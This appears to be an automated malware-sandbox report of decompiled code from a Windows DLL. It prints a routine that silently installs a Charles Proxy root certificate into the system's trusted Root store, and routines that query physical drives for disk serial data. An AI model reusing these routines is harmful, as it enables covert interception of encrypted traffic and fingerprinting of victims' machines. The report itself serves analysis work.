                                                                                                                                                      				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEB
nv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                      					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                      					_t122 = _t121 + 4;
                                                                                                                                                      					_v20 = _t66;
                                                                                                                                                      					_t133 = _v20;
                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                      						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                      						_t69 = _v12;
                                                                                                                                                      						__imp__CertCreateCertificateContext(1, _v20, _t69);
                                                                                                                                                      						_v8 = _t69;
                                                                                                                                                      						_push(_v20);
                                                                                                                                                      						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
                                                                                                                                                      						_t123 = _t122 + 4;
                                                                                                                                                      						if(_v8 != 0) {
                                                                                                                                                      							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
                                                                                                                                                      							_v28 = _t70;
                                                                                                                                                      							if(_v28 != 0) {
                                                                                                                                                      								_t71 = _v8;
                                                                                                                                                      								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
                                                                                                                                                      								if(_t71 == 0) {
                                                                                                                                                      									_t72 = GetLastError();
                                                                                                                                                      									__eflags = _t72 - 0x80092005;
                                                                                                                                                      									if(_t72 == 0x80092005) {
                                                                                                                                                      										_v36 = 0;
                                                                                                                                                      										_v32 = 0;
                                                                                                                                                      										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                      										__eflags = _v36;
                                                                                                                                                      										if(_v36 > 0) {
                                                                                                                                                      											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                      											_t124 = _t123 + 4;
                                                                                                                                                      											_v32 = _t75;
                                                                                                                                                      											__eflags = _v32;
                                                                                                                                                      											if(_v32 != 0) {
                                                                                                                                                      												E1000CF20(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                      												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                      												_v564 = 0;
                                                                                                                                                      												E1000CF20(_t118,  &_v563, 0, 0x103);
                                                                                                                                                      												_v300 = 0;
                                                                                                                                                      												E1000CF20(_t118,  &_v299, 0, 0x103);
                                                                                                                                                      												_t127 = _t124 + 0x24;
                                                                                                                                                      												_v568 = 0;
                                                                                                                                                      												while(1) {
                                                                                                                                                      													__eflags = _v568 - _v36;
                                                                                                                                                      													if(_v568 >= _v36) {
                                                                                                                                                      														break;
                                                                                                                                                      													}
                                                                                                                                                      													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                      													_t127 = _t127 + 0xc;
                                                                                                                                                      													_t90 = _v568 + 1;
                                                                                                                                                      													__eflags = _t90;
                                                                                                                                                      													_v568 = _t90;
                                                                                                                                                      												}
                                                                                                                                                      												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                      												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                      												_push(_v32);
                                                                                                                                                      												E1000CA30(_t91, _t118, _t119, __eflags);
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_v24 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                      							}
                                                                                                                                                      							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}






























                                                                                                                                                      0x1001f809
                                                                                                                                                      0x1001f817
                                                                                                                                                      0x1001f81d
                                                                                                                                                      0x1001f822
                                                                                                                                                      0x1001f828
                                                                                                                                                      0x1001f82f
                                                                                                                                                      0x1001f842
                                                                                                                                                      0x1001f848
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f859
                                                                                                                                                      0x1001f85e
                                                                                                                                                      0x1001f861
                                                                                                                                                      0x1001f864
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f87b
                                                                                                                                                      0x1001f891
                                                                                                                                                      0x1001f897
                                                                                                                                                      0x1001f8ac
                                                                                                                                                      0x1001f8b4
                                                                                                                                                      0x1001f8c9
                                                                                                                                                      0x1001f8ce
                                                                                                                                                      0x1001f8d1
                                                                                                                                                      0x1001f8ec
                                                                                                                                                      0x1001f8f2
                                                                                                                                                      0x1001f8f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001f91c
                                                                                                                                                      0x1001f921
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f939
                                                                                                                                                      0x1001f95d
                                                                                                                                                      0x1001f963
                                                                                                                                                      0x1001f964
                                                                                                                                                      0x1001f969
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f988

                                                                                                                                                      APIs
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                      • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                      • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                      • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1001D7E0(void* __edi, intOrPtr _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				signed short* _v44;
                                                                                                                                                      				void* _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				signed int* _v60;
                                                                                                                                                      				char _v570;
                                                                                                                                                      				short _v572;
                                                                                                                                                      				char _v1596;
                                                                                                                                                      				void* _v1600;
                                                                                                                                                      				char _v1604;
                                                                                                                                                      				long _v1608;
                                                                                                                                                      				signed int _v1612;
                                                                                                                                                      				void* _v1616;
                                                                                                                                                      				void* _v1620;
                                                                                                                                                      				void* _v1624;
                                                                                                                                                      				void* _v1628;
                                                                                                                                                      				void* _v1632;
                                                                                                                                                      				signed int _v1633;
                                                                                                                                                      				void _v1636;
                                                                                                                                                      				char _v2148;
                                                                                                                                                      				char _v2164;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t123;
                                                                                                                                                      				void* _t124;
                                                                                                                                                      
                                                                                                                                                      				_t123 = __edi;
                                                                                                                                                      				_v52 = _a4;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					L18:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_v1600 = 0;
                                                                                                                                                      				_v1612 = 0;
                                                                                                                                                      				while(1 != 0) {
                                                                                                                                                      					_v572 = 0;
                                                                                                                                                      					E1000CF20(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                      					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                      					_t124 = _t124 + 0x18;
                                                                                                                                                      					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                      					if(_v48 == 0xffffffff) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_v1612 = 1 + _v1612;
                                                                                                                                                      						if(_v1612 < 4) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return _v1600;
                                                                                                                                                      					}
                                                                                                                                                      					_v1608 = 0;
                                                                                                                                                      					_v1636 = 0;
                                                                                                                                                      					_v1632 = 0;
                                                                                                                                                      					_v1628 = 0;
                                                                                                                                                      					_v1624 = 0;
                                                                                                                                                      					_v1620 = 0;
                                                                                                                                                      					_v1616 = 0;
                                                                                                                                                      					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
                                                                                                                                                      						CloseHandle(_v48);
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						CloseHandle(_v48);
                                                                                                                                                      						if(_v1600 == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						}
                                                                                                                                                      						return _v1600;
                                                                                                                                                      					}
                                                                                                                                                      					asm("sbb edx, edx");
                                                                                                                                                      					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                      					_v40 = 0;
                                                                                                                                                      					_v36 = 0;
                                                                                                                                                      					_v32 = 0;
                                                                                                                                                      					_v28 = 0;
                                                                                                                                                      					_v24 = 0;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					_v16 = 0;
                                                                                                                                                      					_v12 = 0;
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					E1000CF20(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                      					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                      					_t124 = _t124 + 0x24;
                                                                                                                                                      					if(_t88 == 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_v60 =  &_v1596;
                                                                                                                                                      					_v44 =  &_v2148;
                                                                                                                                                      					do {
                                                                                                                                                      						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                      						_v44 =  &(_v44[1]);
                                                                                                                                                      						_v60 =  &(_v60[1]);
                                                                                                                                                      					} while (_v44 <  &_v1636);
                                                                                                                                                      					_v56 = E1001CD70( &_v1596);
                                                                                                                                                      					_t94 = E1001CFA0(_v56, 0x104, _v52);
                                                                                                                                                      					_t124 = _t124 + 0x10;
                                                                                                                                                      					if(_t94 == 0) {
                                                                                                                                                      						_v1600 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				goto L18;
                                                                                                                                                      			}






































                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001D831
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D8E3
                                                                                                                                                      • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 381188756-2935326385
                                                                                                                                                      • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                      • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E1001DA70(void* __edi, intOrPtr _a4) {
                                                                                                                                                      				struct _OVERLAPPED* _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				short _v532;
                                                                                                                                                      				struct _OVERLAPPED* _v536;
                                                                                                                                                      				struct _OVERLAPPED* _v540;
                                                                                                                                                      				void _v544;
                                                                                                                                                      				long _v548;
                                                                                                                                                      				struct _OVERLAPPED* _v552;
                                                                                                                                                      				intOrPtr _v10532;
                                                                                                                                                      				void _v10556;
                                                                                                                                                      				char _v11556;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      
                                                                                                                                                      				_t70 = __edi;
                                                                                                                                                      				E10018AA0(0x2d20);
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					L13:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v552 = 0;
                                                                                                                                                      				while(1 != 0) {
                                                                                                                                                      					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                      					_t71 = _t71 + 0xc;
                                                                                                                                                      					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
                                                                                                                                                      					if(_v16 == 0xffffffff) {
                                                                                                                                                      						L10:
                                                                                                                                                      						_v8 =  &(_v8->Internal);
                                                                                                                                                      						_v552 = _v8;
                                                                                                                                                      						if(_v8 < 4) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return _v12;
                                                                                                                                                      					}
                                                                                                                                                      					_v548 = 0;
                                                                                                                                                      					_v536 = 0;
                                                                                                                                                      					_v544 = 0;
                                                                                                                                                      					_v540 = 0;
                                                                                                                                                      					E1000CF20(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                      					_t71 = _t71 + 0xc;
                                                                                                                                                      					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
                                                                                                                                                      						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                      						E1001D040(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                      						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
                                                                                                                                                      						_t71 = _t71 + 0x24;
                                                                                                                                                      						if(_t56 == 0) {
                                                                                                                                                      							_v12 = 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					CloseHandle(_v16);
                                                                                                                                                      					if(_v12 == 0) {
                                                                                                                                                      						_v8 = _v552;
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						return _v12;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				goto L13;
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 1858725146-2935326385
                                                                                                                                                      • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                      • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				short _v540;
                                                                                                                                                      				char _v1564;
                                                                                                                                                      				long _v1568;
                                                                                                                                                      				long _v1572;
                                                                                                                                                      				intOrPtr _v1576;
                                                                                                                                                      				struct _OVERLAPPED* _v1580;
                                                                                                                                                      				struct _OVERLAPPED* _v1584;
                                                                                                                                                      				struct _OVERLAPPED* _v1588;
                                                                                                                                                      				struct _OVERLAPPED* _v1592;
                                                                                                                                                      				struct _OVERLAPPED* _v1596;
                                                                                                                                                      				struct _OVERLAPPED* _v1600;
                                                                                                                                                      				struct _OVERLAPPED* _v1604;
                                                                                                                                                      				void _v1608;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				int _t63;
                                                                                                                                                      				void* _t64;
                                                                                                                                                      				int _t76;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				_t97 = __esi;
                                                                                                                                                      				_t96 = __edi;
                                                                                                                                                      				_t77 = __ebx;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v16 = _a4;
                                                                                                                                                      				_v1584 = 0;
                                                                                                                                                      				_v1580 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                      					_t99 = _t99 + 0xc;
                                                                                                                                                      					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                      					if(_v24 != 0xffffffff) {
                                                                                                                                                      						_v1572 = 0;
                                                                                                                                                      						_v1608 = 0;
                                                                                                                                                      						_v1604 = 0;
                                                                                                                                                      						_v1600 = 0;
                                                                                                                                                      						_v1596 = 0;
                                                                                                                                                      						_v1592 = 0;
                                                                                                                                                      						_v1588 = 0;
                                                                                                                                                      						// 0x74080 is SMART_GET_VERSION: checks that the drive answers SMART/ATA pass-through requests.
                                                                                                                                                      						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                      						__eflags = _t63;
                                                                                                                                                      						if(_t63 != 0) {
                                                                                                                                                      							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                      							_t100 = _t99 + 4;
                                                                                                                                                      							_v8 = _t64;
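                                                                                                                                                      							// Offset 0xa of SENDCMDINPARAMS is irDriveRegs.bCommandReg; 0xec is the ATA IDENTIFY DEVICE command.
                                                                                                                                                      							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                      							_v1568 = 0;
                                                                                                                                                      							// 0x7c088 is SMART_RCV_DRIVE_DATA: returns the 512-byte IDENTIFY block (model, serial, firmware) at offset 0x10 of the output buffer.
                                                                                                                                                      							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);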
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								L10:
                                                                                                                                                      								CloseHandle(_v24);
                                                                                                                                                      								_push(_v8);
                                                                                                                                                      								E1000CA30(_t77, _t96, _t97, __eflags);
                                                                                                                                                      								_t99 = _t100 + 4;
                                                                                                                                                      								__eflags = _v1584;
                                                                                                                                                      								if(_v1584 == 0) {
                                                                                                                                                      									_v12 = _v1580;
                                                                                                                                                      									goto L13;
                                                                                                                                                      								}
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v20 = 0;
                                                                                                                                                      							do {
                                                                                                                                                      								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                      								_v20 = _v20 + 1;
                                                                                                                                                      								__eflags = _v20 - 0x100;
                                                                                                                                                      							} while (_v20 < 0x100);
                                                                                                                                                      							_v1576 = E1001CD70( &_v1564);
                                                                                                                                                      							_t76 = E1001CFA0(_v1576, 0x104, _v16);
                                                                                                                                                      							_t100 = _t100 + 0x10;
                                                                                                                                                      							__eflags = _t76;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_v1584 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					L13:
                                                                                                                                                      					_v12 =  &(_v12->Internal);
                                                                                                                                                      					_v1580 = _v12;
                                                                                                                                                      				} while (_v12 < 4);
                                                                                                                                                      				return _v1584;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
